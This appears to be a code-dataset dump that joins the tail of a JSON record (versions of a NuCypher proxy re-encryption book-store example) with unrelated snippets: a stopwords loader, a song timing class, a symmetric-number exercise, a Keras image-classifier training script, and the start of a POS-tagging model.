"step-4": "from eth_account.account import Account\nfrom nucypher.characters.lawful import Alice, Bob, Ursula\nfrom nucypher.network.middleware import RestMiddleware\nfrom nucypher.data_sources import DataSource\nfrom umbral.keys import UmbralPublicKey\nimport sys\nimport os\nimport binascii\nimport shutil\nimport maya\nimport datetime\nteacher_rest_port = 3501\nm = 2\nn = 3\nwith open('examples-runtime-cruft/node-metadata-{}'.format(\n teacher_rest_port), 'r') as f:\n f.seek(0)\n teacher_bytes = binascii.unhexlify(f.read())\nURSULA = Ursula.from_bytes(teacher_bytes, federated_only=True)\nprint('Will learn from {}'.format(URSULA))\nSHARED_CRUFTSPACE = '{}/examples-runtime-cruft'.format(os.path.dirname(os.\n path.abspath(__file__)))\nCRUFTSPACE = '{}/drm'.format(SHARED_CRUFTSPACE)\nCERTIFICATE_DIR = '{}/certs'.format(CRUFTSPACE)\nshutil.rmtree(CRUFTSPACE, ignore_errors=True)\nos.mkdir(CRUFTSPACE)\nos.mkdir(CERTIFICATE_DIR)\nURSULA.save_certificate_to_disk(CERTIFICATE_DIR)\n\n\nclass ETHAccount(object):\n\n def send_eth_to(self, to, amount):\n return to.fallback(self, amount)\n\n\nclass Author(object):\n \"\"\"\n The author of the book\n \"\"\"\n balance = 0\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nclass Book(object):\n\n def __init__(self, author):\n self.author = author\n self.content = b'PlainText of the book'\n self.label = b'book'\n\n\nclass BookStoreEthContract(object):\n \"\"\"\n The contract receiving the rewards and selling the books\n \"\"\"\n\n def __init__(self, book, author, price, purchase_event_hook):\n self.book = book\n self.rewardee = author\n self.price = price\n self.purchase_event_hook = purchase_event_hook\n\n def fallback(self, sender, amount):\n print('Received %s ETH from %s' % (amount, sender.account.address))\n if amount == self.price:\n sender.balance -= amount\n self.rewardee.balance += amount\n return self.purchase_event_hook(sender)\n\n\nclass BookStoreDelivery(object):\n\n def __init__(self, book):\n self.book = book\n self.author = book.author\n\n def deliver_purchase(self, to):\n policy_end_datetime = maya.now() + datetime.timedelta(days=5)\n policy = author.character.grant(first_buyer.character, self.book.\n label, m=m, n=n, expiration=policy_end_datetime)\n author_pubkey = bytes(self.author.character.stamp)\n data_source = DataSource(policy_pubkey_enc=policy.public_key)\n message_kit, _signature = data_source.encapsulate_single_message(self\n .book.content)\n data_source_public_key = bytes(data_source.stamp)\n return (author_pubkey, policy.public_key, data_source_public_key,\n self.book.label, message_kit)\n\n\nclass Buyer(ETHAccount):\n \"\"\"\n The person who pays for the book and receives content\n \"\"\"\n balance = 100\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nauthor = Author(b\"Author's ETH account\", Alice(network_middleware=\n RestMiddleware(), known_nodes=(URSULA,), federated_only=True,\n known_certificates_dir=CERTIFICATE_DIR))\nauthor.character.start_learning_loop(now=True)\nbook = Book(author)\nfirst_buyer = Buyer(b\"First Buyer's ETH account\", Bob(known_nodes=(URSULA,),\n federated_only=True, known_certificates_dir=CERTIFICATE_DIR))\nbook_store_delivery = BookStoreDelivery(book)\nbook_store_contract = BookStoreEthContract(book, author, 10,\n book_store_delivery.deliver_purchase)\n(author_public_key, policy_public_key, data_source_public_key, label, kit\n ) = 
first_buyer.send_eth_to(book_store_contract, 10)\nfirst_buyer.character.join_policy(label, bytes(author.character.stamp),\n node_list=[('localhost', 3601)])\ndatasource_as_understood_by_bob = DataSource.from_public_keys(policy_public_key\n =policy_public_key, datasource_public_key=data_source_public_key, label\n =label)\nalice_pubkey_restored_from_ancient_scroll = UmbralPublicKey.from_bytes(\n author_public_key)\ndelivered_cleartexts = first_buyer.character.retrieve(message_kit=kit,\n data_source=datasource_as_understood_by_bob, alice_verifying_key=\n alice_pubkey_restored_from_ancient_scroll)\nprint(delivered_cleartexts)\n",
"step-5": "from eth_account.account import Account\nfrom nucypher.characters.lawful import Alice, Bob, Ursula\nfrom nucypher.network.middleware import RestMiddleware\nfrom nucypher.data_sources import DataSource\nfrom umbral.keys import UmbralPublicKey\nimport sys\nimport os\nimport binascii\nimport shutil\nimport maya\nimport datetime\n\nteacher_rest_port = 3501\nm = 2\nn = 3\nwith open(\"examples-runtime-cruft/node-metadata-{}\".format(teacher_rest_port), \"r\") as f:\n f.seek(0)\n teacher_bytes = binascii.unhexlify(f.read())\nURSULA = Ursula.from_bytes(teacher_bytes, federated_only=True)\nprint(\"Will learn from {}\".format(URSULA))\nSHARED_CRUFTSPACE = \"{}/examples-runtime-cruft\".format(os.path.dirname(os.path.abspath(__file__)))\nCRUFTSPACE = \"{}/drm\".format(SHARED_CRUFTSPACE)\nCERTIFICATE_DIR = \"{}/certs\".format(CRUFTSPACE)\nshutil.rmtree(CRUFTSPACE, ignore_errors=True)\nos.mkdir(CRUFTSPACE)\nos.mkdir(CERTIFICATE_DIR)\nURSULA.save_certificate_to_disk(CERTIFICATE_DIR)\n\nclass ETHAccount(object):\n def send_eth_to(self, to, amount):\n return(to.fallback(self, amount))\n\nclass Author(object):\n \"\"\"\n The author of the book\n \"\"\"\n balance = 0\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nclass Book(object):\n def __init__(self, author):\n self.author = author\n self.content = b\"PlainText of the book\"\n self.label = b\"book\"\n\n\nclass BookStoreEthContract(object):\n \"\"\"\n The contract receiving the rewards and selling the books\n \"\"\"\n def __init__(self, book, author, price, purchase_event_hook):\n self.book = book\n self.rewardee = author\n self.price = price\n self.purchase_event_hook = purchase_event_hook\n\n def fallback(self, sender, amount):\n print(\"Received %s ETH from %s\" % (amount, sender.account.address))\n if amount == self.price:\n sender.balance -= amount\n self.rewardee.balance += amount\n return(self.purchase_event_hook(sender))\n\nclass BookStoreDelivery(object):\n def __init__(self, book):\n self.book = book\n self.author = book.author\n\n def deliver_purchase(self, to):\n policy_end_datetime = maya.now() + datetime.timedelta(days=5)\n policy = author.character.grant(first_buyer.character, self.book.label, m=m, n=n,\n expiration=policy_end_datetime)\n author_pubkey = bytes(self.author.character.stamp)\n data_source = DataSource(policy_pubkey_enc=policy.public_key)\n message_kit, _signature = data_source.encapsulate_single_message(self.book.content)\n data_source_public_key = bytes(data_source.stamp)\n return (author_pubkey, policy.public_key, data_source_public_key, self.book.label, message_kit)\n\n\n\n\nclass Buyer(ETHAccount):\n \"\"\"\n The person who pays for the book and receives content\n \"\"\"\n balance = 100\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nauthor = Author(b\"Author's ETH account\", Alice(network_middleware=RestMiddleware(),\n known_nodes=(URSULA,),\n federated_only=True,\n known_certificates_dir=CERTIFICATE_DIR,))\nauthor.character.start_learning_loop(now=True)\n\nbook = Book(author)\nfirst_buyer = Buyer(b\"First Buyer's ETH account\", Bob(known_nodes=(URSULA,),\n federated_only=True,\n known_certificates_dir=CERTIFICATE_DIR))\nbook_store_delivery = BookStoreDelivery(book)\nbook_store_contract = BookStoreEthContract(book, author, 10, book_store_delivery.deliver_purchase)\nauthor_public_key, policy_public_key, data_source_public_key, label, kit = 
first_buyer.send_eth_to(book_store_contract, 10)\nfirst_buyer.character.join_policy(label, # The label - he needs to know what data he's after.\n bytes(author.character.stamp), # To verify the signature, he'll need Alice's public key.\n # He can also bootstrap himself onto the network more quickly\n # by providing a list of known nodes at this time.\n node_list=[(\"localhost\", 3601)]\n )\ndatasource_as_understood_by_bob = DataSource.from_public_keys(\n policy_public_key=policy_public_key,\n datasource_public_key=data_source_public_key,\n label=label\n )\nalice_pubkey_restored_from_ancient_scroll = UmbralPublicKey.from_bytes(author_public_key)\ndelivered_cleartexts = first_buyer.character.retrieve(message_kit=kit,\n data_source=datasource_as_understood_by_bob,\n alice_verifying_key=alice_pubkey_restored_from_ancient_scroll)\nprint(delivered_cleartexts)\n\n\n",
"step-ids": [
14,
19,
20,
22,
23
]
}
|
[
14,
19,
20,
22,
23
] |
import os as os
import io as io
import re
class Stopwords:
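    """Loads a list of stopwords (one lowercased word per line) from a file in base_dir."""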
def __init__(self, base_dir='data'):
self.base_dir = base_dir
def load_stopwords(self, base_dir=None, stopwords_file='stopwords.csv'):
# Load stopwords from file.
if base_dir is not None:
self.base_dir = base_dir
filename = os.path.join(self.base_dir, stopwords_file)
self.stopwords = []
pattern = re.compile('[\r\n]')
with open(filename, 'r', encoding='utf-8') as fin:
self.stopwords = [re.sub(pattern, '', word.lower()) for word in fin]
return self.stopwords
|
normal
|
{
"blob_id": "dad4e14da734f2e2329f4cbe064c73c82a4ae27c",
"index": 8119,
"step-1": "<mask token>\n\n\nclass Stopwords:\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Stopwords:\n\n def __init__(self, base_dir='data'):\n self.base_dir = base_dir\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Stopwords:\n\n def __init__(self, base_dir='data'):\n self.base_dir = base_dir\n\n def load_stopwords(self, base_dir=None, stopwords_file='stopwords.csv'):\n if base_dir is not None:\n self.base_dir = base_dir\n filename = os.path.join(self.base_dir, stopwords_file)\n self.stopwords = []\n pattern = re.compile('[\\r\\n]')\n with open(filename, 'r', encoding='utf-8') as fin:\n self.stopwords = [re.sub(pattern, '', word.lower()) for word in fin\n ]\n return self.stopwords\n",
"step-4": "import os as os\nimport io as io\nimport re\n\n\nclass Stopwords:\n\n def __init__(self, base_dir='data'):\n self.base_dir = base_dir\n\n def load_stopwords(self, base_dir=None, stopwords_file='stopwords.csv'):\n if base_dir is not None:\n self.base_dir = base_dir\n filename = os.path.join(self.base_dir, stopwords_file)\n self.stopwords = []\n pattern = re.compile('[\\r\\n]')\n with open(filename, 'r', encoding='utf-8') as fin:\n self.stopwords = [re.sub(pattern, '', word.lower()) for word in fin\n ]\n return self.stopwords\n",
"step-5": "import os as os\nimport io as io\nimport re\n\nclass Stopwords:\n\n def __init__(self, base_dir='data'):\n self.base_dir = base_dir\n\n def load_stopwords(self, base_dir=None, stopwords_file='stopwords.csv'):\n # Load stopwords from file.\n if base_dir is not None:\n self.base_dir = base_dir\n filename = os.path.join(self.base_dir, stopwords_file)\n\n self.stopwords = []\n pattern = re.compile('[\\r\\n]')\n with open(filename, 'r', encoding='utf-8') as fin:\n self.stopwords = [re.sub(pattern, '', word.lower()) for word in fin]\n return self.stopwords",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from Song import Song
class FroggyWoogie(Song):
def __init__(self):
super(FroggyWoogie, self).__init__()
self.file = 'Music/5-Sleepy_Koala_-_Froggy_Woogie.mp3'
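        # Each plan entry appears to be [start_time_sec, count, segment_type, duration_sec];
        # 'W'/'S' mark two segment kinds. These field names are assumptions; the snippet does
        # not document them (start times do line up with the preceding entry's duration).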
self.plan = [[0.0, 32, 'W', 16.271], [16.271, 16, 'S', 8.135], [
24.406, 44, 'S', 22.373], [46.779, 16, 'S', 8.136], [54.915, 18,
'S', 1.017], [55.932, 36, 'S', 18.305], [74.237, 14, 'S', 7.118
], [81.355, 32, 'W', 16.293], [97.648, 32, 'S', 16.25], [
113.898, 32, 'S', 16.271], [130.169, 32, 'S', 16.271], [146.44,
64, 'S', 32.532], [178.972, 32, 'S', 16.282], [195.254, 32, 'S',
16.271], [211.525, 32, 'W', 16.271], [227.796, 32, 'W', 16.271],
[244.067, 32, 'W', 16.271], [260.338, 32, 'W', 16.272], [276.61,
32, 'W', 16.271], [292.881, 32, 'S', 16.271], [309.152, 32, 'S',
16.271], [325.423, 36, 'S', 18.305], [343.728, 32, 'W', 34.577]]
|
normal
|
{
"blob_id": "1df1081308ead28c023774a8671df8a0671a1bba",
"index": 4177,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass FroggyWoogie(Song):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass FroggyWoogie(Song):\n\n def __init__(self):\n super(FroggyWoogie, self).__init__()\n self.file = 'Music/5-Sleepy_Koala_-_Froggy_Woogie.mp3'\n self.plan = [[0.0, 32, 'W', 16.271], [16.271, 16, 'S', 8.135], [\n 24.406, 44, 'S', 22.373], [46.779, 16, 'S', 8.136], [54.915, 18,\n 'S', 1.017], [55.932, 36, 'S', 18.305], [74.237, 14, 'S', 7.118\n ], [81.355, 32, 'W', 16.293], [97.648, 32, 'S', 16.25], [\n 113.898, 32, 'S', 16.271], [130.169, 32, 'S', 16.271], [146.44,\n 64, 'S', 32.532], [178.972, 32, 'S', 16.282], [195.254, 32, 'S',\n 16.271], [211.525, 32, 'W', 16.271], [227.796, 32, 'W', 16.271],\n [244.067, 32, 'W', 16.271], [260.338, 32, 'W', 16.272], [276.61,\n 32, 'W', 16.271], [292.881, 32, 'S', 16.271], [309.152, 32, 'S',\n 16.271], [325.423, 36, 'S', 18.305], [343.728, 32, 'W', 34.577]]\n",
"step-4": "from Song import Song\n\n\nclass FroggyWoogie(Song):\n\n def __init__(self):\n super(FroggyWoogie, self).__init__()\n self.file = 'Music/5-Sleepy_Koala_-_Froggy_Woogie.mp3'\n self.plan = [[0.0, 32, 'W', 16.271], [16.271, 16, 'S', 8.135], [\n 24.406, 44, 'S', 22.373], [46.779, 16, 'S', 8.136], [54.915, 18,\n 'S', 1.017], [55.932, 36, 'S', 18.305], [74.237, 14, 'S', 7.118\n ], [81.355, 32, 'W', 16.293], [97.648, 32, 'S', 16.25], [\n 113.898, 32, 'S', 16.271], [130.169, 32, 'S', 16.271], [146.44,\n 64, 'S', 32.532], [178.972, 32, 'S', 16.282], [195.254, 32, 'S',\n 16.271], [211.525, 32, 'W', 16.271], [227.796, 32, 'W', 16.271],\n [244.067, 32, 'W', 16.271], [260.338, 32, 'W', 16.272], [276.61,\n 32, 'W', 16.271], [292.881, 32, 'S', 16.271], [309.152, 32, 'S',\n 16.271], [325.423, 36, 'S', 18.305], [343.728, 32, 'W', 34.577]]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
"""
2. Schreiben Sie die Anzahl von symmetrischen Paaren (xy) und (yx).
"""
def symetrisch(x, y):
"""
bestimmt weder zwei zweistellige Zahlen x und y symetrisch sind
:param x: ein Element der Liste
:param y: ein Element der Liste
:return: True- wenn x und y symetrisch
False - sonst
"""
if ((x % 10) == (y // 10)) and ((x // 10) == (y % 10)):
return True
else:
return False
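# e.g. symetrisch(12, 21) -> True, symetrisch(12, 34) -> False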
def anz_von_sym(lst):
"""
mit 2 For-Schleifen durchquert die Funktion die Liste und untersucht je ein Element mit der restlichen Liste
:param lst: die Liste
:return: Anzahl der symetrischen Paaren der Liste
"""
anz = 0
for i in range(len(lst) - 1):
for j in range(i, len(lst)):
if symetrisch(lst[i], lst[j]):
anz += 1
print("Anzahl symmetrischer Paaren:", anz)
|
normal
|
{
"blob_id": "2c6dc4d55f64d7c3c01b3f504a72904451cb4610",
"index": 6532,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef symetrisch(x, y):\n \"\"\"\n bestimmt weder zwei zweistellige Zahlen x und y symetrisch sind\n :param x: ein Element der Liste\n :param y: ein Element der Liste\n :return: True- wenn x und y symetrisch\n False - sonst\n \"\"\"\n if x % 10 == y // 10 and x // 10 == y % 10:\n return True\n else:\n return False\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef symetrisch(x, y):\n \"\"\"\n bestimmt weder zwei zweistellige Zahlen x und y symetrisch sind\n :param x: ein Element der Liste\n :param y: ein Element der Liste\n :return: True- wenn x und y symetrisch\n False - sonst\n \"\"\"\n if x % 10 == y // 10 and x // 10 == y % 10:\n return True\n else:\n return False\n\n\ndef anz_von_sym(lst):\n \"\"\"\n mit 2 For-Schleifen durchquert die Funktion die Liste und untersucht je ein Element mit der restlichen Liste\n :param lst: die Liste\n :return: Anzahl der symetrischen Paaren der Liste\n \"\"\"\n anz = 0\n for i in range(len(lst) - 1):\n for j in range(i, len(lst)):\n if symetrisch(lst[i], lst[j]):\n anz += 1\n print('Anzahl symmetrischer Paaren:', anz)\n",
"step-4": "\"\"\"\n2. Schreiben Sie die Anzahl von symmetrischen Paaren (xy) und (yx).\n\"\"\"\n\n\ndef symetrisch(x, y):\n \"\"\"\n bestimmt weder zwei zweistellige Zahlen x und y symetrisch sind\n :param x: ein Element der Liste\n :param y: ein Element der Liste\n :return: True- wenn x und y symetrisch\n False - sonst\n \"\"\"\n if ((x % 10) == (y // 10)) and ((x // 10) == (y % 10)):\n return True\n else:\n return False\n\n\ndef anz_von_sym(lst):\n \"\"\"\n mit 2 For-Schleifen durchquert die Funktion die Liste und untersucht je ein Element mit der restlichen Liste\n :param lst: die Liste\n :return: Anzahl der symetrischen Paaren der Liste\n \"\"\"\n anz = 0\n for i in range(len(lst) - 1):\n for j in range(i, len(lst)):\n if symetrisch(lst[i], lst[j]):\n anz += 1\n print(\"Anzahl symmetrischer Paaren:\", anz)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import PIL
from matplotlib import pyplot as plt
import matplotlib
from keras.preprocessing.image import ImageDataGenerator
from keras.models import load_model
from keras.models import Sequential
from keras.layers import Dense, Dropout
from keras.optimizers import RMSprop
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras.callbacks import EarlyStopping
from keras import backend as K
import keras
from time import time
from sklearn.metrics import classification_report, confusion_matrix
import numpy as np
#model = load_model("./Modelo_C32K44_C128k44_d075_D256_d05_D5.h5")
#model = load_model("./Modelo_C32k55_C64k55_d025_D128_d05_D5.h5")
model = load_model("./Modelo_C64k33_C128k33_d025_D256_d05_D5.h5")
model.fit
batch_size = 20
epochs = 100
train_data_dir = 'D:/Universidad/OneDrive - Universidad de Las Palmas de Gran Canaria/TERCERO/Fundamentos de los Sistemas Inteligentes/RedesNeuronales/cars_colours/train'
validation_data_dir = 'D:/Universidad/OneDrive - Universidad de Las Palmas de Gran Canaria/TERCERO/Fundamentos de los Sistemas Inteligentes/RedesNeuronales/cars_colours/test'
train_datagen = ImageDataGenerator(
rescale=1./255,
rotation_range=15,
zoom_range=0.1
)
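# Training images are rescaled to [0, 1] and lightly augmented (rotations up to 15 degrees,
# 10% zoom); the validation generators below only rescale.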
validation_datagen = ImageDataGenerator(
rescale=1./255
)
validation_datagen = ImageDataGenerator(
rescale=1./255
)
validation_generator = validation_datagen.flow_from_directory(
validation_data_dir,
target_size=(250, 150),
batch_size=batch_size,
class_mode='categorical')
train_generator = train_datagen.flow_from_directory(
train_data_dir,
target_size=(250, 150),
batch_size=batch_size,
class_mode='categorical')
validation_generator = validation_datagen.flow_from_directory(
validation_data_dir,
target_size=(250, 150),
batch_size=batch_size,
class_mode='categorical')
history = model.fit_generator(
train_generator,
epochs=epochs,
validation_data = validation_generator,
#callbacks = [es]
)
model.save("./T_100_Modelo_C64k33_C128k33_d025_D256_d05_D5.h5")
plt.plot(history.history['accuracy'], label='accuracy')
plt.plot(history.history['val_accuracy'], label='validation accuracy')
plt.plot(history.history['val_loss'], label='val_loss')
plt.plot(history.history['loss'], label='loss')
plt.title('Accuracy y Loss Clasificando coches por color')
plt.xlabel('Épocas')
plt.legend(loc="lower right")
plt.show()
|
normal
|
{
"blob_id": "d2f760b821fc5c599cda1091334364e18234ab06",
"index": 4222,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nmodel.fit\n<mask token>\nmodel.save('./T_100_Modelo_C64k33_C128k33_d025_D256_d05_D5.h5')\nplt.plot(history.history['accuracy'], label='accuracy')\nplt.plot(history.history['val_accuracy'], label='validation accuracy')\nplt.plot(history.history['val_loss'], label='val_loss')\nplt.plot(history.history['loss'], label='loss')\nplt.title('Accuracy y Loss Clasificando coches por color')\nplt.xlabel('Épocas')\nplt.legend(loc='lower right')\nplt.show()\n",
"step-3": "<mask token>\nmodel = load_model('./Modelo_C64k33_C128k33_d025_D256_d05_D5.h5')\nmodel.fit\nbatch_size = 20\nepochs = 100\ntrain_data_dir = (\n 'D:/Universidad/OneDrive - Universidad de Las Palmas de Gran Canaria/TERCERO/Fundamentos de los Sistemas Inteligentes/RedesNeuronales/cars_colours/train'\n )\nvalidation_data_dir = (\n 'D:/Universidad/OneDrive - Universidad de Las Palmas de Gran Canaria/TERCERO/Fundamentos de los Sistemas Inteligentes/RedesNeuronales/cars_colours/test'\n )\ntrain_datagen = ImageDataGenerator(rescale=1.0 / 255, rotation_range=15,\n zoom_range=0.1)\nvalidation_datagen = ImageDataGenerator(rescale=1.0 / 255)\nvalidation_datagen = ImageDataGenerator(rescale=1.0 / 255)\nvalidation_generator = validation_datagen.flow_from_directory(\n validation_data_dir, target_size=(250, 150), batch_size=batch_size,\n class_mode='categorical')\ntrain_generator = train_datagen.flow_from_directory(train_data_dir,\n target_size=(250, 150), batch_size=batch_size, class_mode='categorical')\nvalidation_generator = validation_datagen.flow_from_directory(\n validation_data_dir, target_size=(250, 150), batch_size=batch_size,\n class_mode='categorical')\nhistory = model.fit_generator(train_generator, epochs=epochs,\n validation_data=validation_generator)\nmodel.save('./T_100_Modelo_C64k33_C128k33_d025_D256_d05_D5.h5')\nplt.plot(history.history['accuracy'], label='accuracy')\nplt.plot(history.history['val_accuracy'], label='validation accuracy')\nplt.plot(history.history['val_loss'], label='val_loss')\nplt.plot(history.history['loss'], label='loss')\nplt.title('Accuracy y Loss Clasificando coches por color')\nplt.xlabel('Épocas')\nplt.legend(loc='lower right')\nplt.show()\n",
"step-4": "import PIL\nfrom matplotlib import pyplot as plt\nimport matplotlib\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import load_model\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras.optimizers import RMSprop\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.callbacks import EarlyStopping\nfrom keras import backend as K\nimport keras\nfrom time import time\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport numpy as np\nmodel = load_model('./Modelo_C64k33_C128k33_d025_D256_d05_D5.h5')\nmodel.fit\nbatch_size = 20\nepochs = 100\ntrain_data_dir = (\n 'D:/Universidad/OneDrive - Universidad de Las Palmas de Gran Canaria/TERCERO/Fundamentos de los Sistemas Inteligentes/RedesNeuronales/cars_colours/train'\n )\nvalidation_data_dir = (\n 'D:/Universidad/OneDrive - Universidad de Las Palmas de Gran Canaria/TERCERO/Fundamentos de los Sistemas Inteligentes/RedesNeuronales/cars_colours/test'\n )\ntrain_datagen = ImageDataGenerator(rescale=1.0 / 255, rotation_range=15,\n zoom_range=0.1)\nvalidation_datagen = ImageDataGenerator(rescale=1.0 / 255)\nvalidation_datagen = ImageDataGenerator(rescale=1.0 / 255)\nvalidation_generator = validation_datagen.flow_from_directory(\n validation_data_dir, target_size=(250, 150), batch_size=batch_size,\n class_mode='categorical')\ntrain_generator = train_datagen.flow_from_directory(train_data_dir,\n target_size=(250, 150), batch_size=batch_size, class_mode='categorical')\nvalidation_generator = validation_datagen.flow_from_directory(\n validation_data_dir, target_size=(250, 150), batch_size=batch_size,\n class_mode='categorical')\nhistory = model.fit_generator(train_generator, epochs=epochs,\n validation_data=validation_generator)\nmodel.save('./T_100_Modelo_C64k33_C128k33_d025_D256_d05_D5.h5')\nplt.plot(history.history['accuracy'], label='accuracy')\nplt.plot(history.history['val_accuracy'], label='validation accuracy')\nplt.plot(history.history['val_loss'], label='val_loss')\nplt.plot(history.history['loss'], label='loss')\nplt.title('Accuracy y Loss Clasificando coches por color')\nplt.xlabel('Épocas')\nplt.legend(loc='lower right')\nplt.show()\n",
"step-5": "import PIL\nfrom matplotlib import pyplot as plt\nimport matplotlib\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import load_model\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras.optimizers import RMSprop\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.callbacks import EarlyStopping\nfrom keras import backend as K\nimport keras\nfrom time import time\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport numpy as np\n\n#model = load_model(\"./Modelo_C32K44_C128k44_d075_D256_d05_D5.h5\")\n#model = load_model(\"./Modelo_C32k55_C64k55_d025_D128_d05_D5.h5\")\nmodel = load_model(\"./Modelo_C64k33_C128k33_d025_D256_d05_D5.h5\")\nmodel.fit\nbatch_size = 20\nepochs = 100\n\ntrain_data_dir = 'D:/Universidad/OneDrive - Universidad de Las Palmas de Gran Canaria/TERCERO/Fundamentos de los Sistemas Inteligentes/RedesNeuronales/cars_colours/train'\nvalidation_data_dir = 'D:/Universidad/OneDrive - Universidad de Las Palmas de Gran Canaria/TERCERO/Fundamentos de los Sistemas Inteligentes/RedesNeuronales/cars_colours/test'\n\ntrain_datagen = ImageDataGenerator(\n rescale=1./255,\n rotation_range=15,\n zoom_range=0.1\n)\n\nvalidation_datagen = ImageDataGenerator(\n rescale=1./255\n)\n\nvalidation_datagen = ImageDataGenerator(\n rescale=1./255\n)\n\nvalidation_generator = validation_datagen.flow_from_directory(\n validation_data_dir,\n target_size=(250, 150),\n batch_size=batch_size,\n class_mode='categorical')\n\ntrain_generator = train_datagen.flow_from_directory(\n train_data_dir,\n target_size=(250, 150),\n batch_size=batch_size,\n class_mode='categorical')\n\nvalidation_generator = validation_datagen.flow_from_directory(\n validation_data_dir,\n target_size=(250, 150),\n batch_size=batch_size,\n class_mode='categorical')\n\nhistory = model.fit_generator(\n train_generator,\n epochs=epochs,\n validation_data = validation_generator,\n #callbacks = [es]\n)\n\nmodel.save(\"./T_100_Modelo_C64k33_C128k33_d025_D256_d05_D5.h5\")\n\nplt.plot(history.history['accuracy'], label='accuracy')\nplt.plot(history.history['val_accuracy'], label='validation accuracy')\nplt.plot(history.history['val_loss'], label='val_loss')\nplt.plot(history.history['loss'], label='loss')\n\nplt.title('Accuracy y Loss Clasificando coches por color')\nplt.xlabel('Épocas')\nplt.legend(loc=\"lower right\")\n\nplt.show()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import sys
sys.path.append("..")
import helpers
helpers.mask_busy_gpus(wait=False)
import nltk
import numpy as np
nltk.download('brown')
nltk.download('universal_tagset')
data = nltk.corpus.brown.tagged_sents(tagset='universal')
all_tags = ['#EOS#','#UNK#','ADV', 'NOUN', 'ADP', 'PRON', 'DET', '.', 'PRT', 'VERB', 'X', 'NUM', 'CONJ', 'ADJ']
data = np.array([ [(word.lower(),tag) for word,tag in sentence] for sentence in data ])
from sklearn.cross_validation import train_test_split
train_data,test_data = train_test_split(data,test_size=0.25,random_state=42)
from collections import Counter
word_counts = Counter()
for sentence in data:
words,tags = zip(*sentence)
word_counts.update(words)
all_words = ['#EOS#','#UNK#']+list(list(zip(*word_counts.most_common(10000)))[0])
#print(all_words)
#let's measure what fraction of data words are in the dictionary
print("Coverage = %.5f"%(float(sum(word_counts[w] for w in all_words)) / sum(word_counts.values())))
from collections import defaultdict
word_to_id = defaultdict(lambda:1,{word:i for i,word in enumerate(all_words)})
tag_to_id = {tag:i for i,tag in enumerate(all_tags)}
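# Out-of-vocabulary words fall back to id 1 ('#UNK#') via the defaultdict; id 0 ('#EOS#')
# doubles as the padding value used by to_matrix below.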
def to_matrix(lines,token_to_id,max_len=None,pad=0,dtype='int32',time_major=False):
"""Converts a list of names into rnn-digestable matrix with paddings added after the end"""
max_len = max_len or max(map(len,lines))
matrix = np.empty([len(lines),max_len],dtype)
matrix.fill(pad)
for i in range(len(lines)):
line_ix = list(map(token_to_id.__getitem__,lines[i]))[:max_len]
matrix[i,:len(line_ix)] = line_ix
return matrix.T if time_major else matrix
batch_words,batch_tags = zip(*[zip(*sentence) for sentence in data[-3:]])
print("Word ids:")
print(to_matrix(batch_words,word_to_id))
print("Tag ids:")
print(to_matrix(batch_tags,tag_to_id))
import keras
import keras.layers as L
from keras.utils.np_utils import to_categorical
BATCH_SIZE=32
def generate_batches(sentences,batch_size=BATCH_SIZE,max_len=None,pad=0):
    assert isinstance(sentences,np.ndarray),"Make sure sentences is a numpy array"
while True:
indices = np.random.permutation(np.arange(len(sentences)))
for start in range(0,len(indices)-1,batch_size):
batch_indices = indices[start:start+batch_size]
batch_words,batch_tags = [],[]
for sent in sentences[batch_indices]:
words,tags = zip(*sent)
batch_words.append(words)
batch_tags.append(tags)
batch_words = to_matrix(batch_words,word_to_id,max_len,pad)
batch_tags = to_matrix(batch_tags,tag_to_id,max_len,pad)
batch_tags_1hot = to_categorical(batch_tags,len(all_tags)).reshape(batch_tags.shape+(-1,))
yield batch_words,batch_tags_1hot
def compute_test_accuracy(model):
test_words,test_tags = zip(*[zip(*sentence) for sentence in test_data])
test_words,test_tags = to_matrix(test_words,word_to_id),to_matrix(test_tags,tag_to_id)
#predict tag probabilities of shape [batch,time,n_tags]
predicted_tag_probabilities = model.predict(test_words,verbose=1)
predicted_tags = predicted_tag_probabilities.argmax(axis=-1)
    #compute accuracy excluding padding
numerator = np.sum(np.logical_and((predicted_tags == test_tags),(test_words != 0)))
denominator = np.sum(test_words != 0)
return float(numerator)/denominator
class EvaluateAccuracy(keras.callbacks.Callback):
def on_epoch_end(self,epoch,logs=None):
sys.stdout.flush()
print("\nMeasuring validation accuracy...")
acc = compute_test_accuracy(self.model)
print("\nValidation accuracy: %.5f\n"%acc)
sys.stdout.flush()
model = keras.models.Sequential()
model = keras.models.Sequential()
model.add(L.InputLayer([None],dtype='int32'))
model.add(L.Embedding(len(all_words),50))
model.add(L.TimeDistributed(L.Dense(96,activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(96,activation='tanh')))
model.add(L.Dropout(0.25))
